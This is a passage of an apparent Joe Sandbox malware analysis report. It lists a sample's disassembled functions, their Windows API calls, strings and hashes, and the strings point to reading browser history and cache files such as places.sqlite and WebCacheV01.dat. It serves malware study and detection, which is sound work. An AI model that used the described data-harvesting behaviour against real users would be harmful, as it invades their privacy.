                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: PrivateProfileString$Write_snwprintfwcschr
                                            • String ID: "%s"
                                            • API String ID: 1343145685-3297466227
                                            • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                            • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                            • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                            • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                            Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                            • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                            • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AddressHandleModuleProcProcessTimes
                                            • String ID: GetProcessTimes$kernel32.dll
                                            • API String ID: 1714573020-3385500049
                                            • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                            • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                            • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                            • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                            Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 004087D6
                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                              • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                            • memset.MSVCRT ref: 00408828
                                            • memset.MSVCRT ref: 00408840
                                            • memset.MSVCRT ref: 00408858
                                            • memset.MSVCRT ref: 00408870
                                            • memset.MSVCRT ref: 00408888
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                            • String ID:
                                            • API String ID: 2911713577-0
                                            • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                            • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                            • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                            • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                            Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                            Download Yara Rule
                                            APIs
                                            • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                            • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                            • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcmp
                                            • String ID: @ $SQLite format 3
                                            • API String ID: 1475443563-3708268960
                                            • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                            • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                            • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                            • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                            Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _wcsicmpqsort
                                            • String ID: /nosort$/sort
                                            • API String ID: 1579243037-1578091866
                                            • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                            • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                            • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                            • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                            Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 0040E60F
                                            • memset.MSVCRT ref: 0040E629
                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                            Strings
                                            • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                            • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                            • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                            • API String ID: 2887208581-2114579845
                                            • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                            • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                            • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                            • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                            Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                            Download Yara Rule
                                            APIs
                                            • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                            • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                            • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                            • LockResource.KERNEL32(00000000), ref: 004148EF
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Resource$FindLoadLockSizeof
                                            • String ID:
                                            • API String ID: 3473537107-0
                                            • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                            • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                            • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                            • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                            Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset
                                            • String ID: only a single result allowed for a SELECT that is part of an expression
                                            • API String ID: 2221118986-1725073988
                                            • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                            • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                            • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                            • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                            Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                            Download Yara Rule
                                            APIs
                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                            • DeleteObject.GDI32(00000000), ref: 004125E7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ??3@DeleteObject
                                            • String ID: r!A
                                            • API String ID: 1103273653-628097481
                                            • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                            • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                            • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                            • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                            Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                            Download Yara Rule
                                            APIs
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ??2@
                                            • String ID:
                                            • API String ID: 1033339047-0
                                            • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                            • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                            • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                            • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                            Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                            • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AddressProc$memcmp
                                            • String ID: $$8
                                            • API String ID: 2808797137-435121686
                                            • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                            • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                            • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                            • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                            Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                              • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                              • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                              • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                              • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                              • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                              • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                              • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                              • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                            • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                              • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                              • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                              • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                            • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                            • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                              • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                              • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                              • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                            • String ID:
                                            • API String ID: 1979745280-0
                                            • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                            • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                            • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                            • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                            Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                              • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                              • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                            • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                            • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                            • free.MSVCRT ref: 00418803
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                            • String ID:
                                            • API String ID: 1355100292-0
                                            • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                            • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                            • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                            • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                            Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                            • memset.MSVCRT ref: 00403A55
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                            • String ID: history.dat$places.sqlite
                                            • API String ID: 2641622041-467022611
                                            • Opcode ID: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
                                            • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                            • Opcode Fuzzy Hash: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
                                            • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                            Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                            • GetLastError.KERNEL32 ref: 00417627
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ErrorLast$File$PointerRead
                                            • String ID:
                                            • API String ID: 839530781-0
                                            • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                            • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                            • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                            • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                            Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: FileFindFirst
                                            • String ID: *.*$index.dat
                                            • API String ID: 1974802433-2863569691
                                            • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                            • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                            • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                            • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
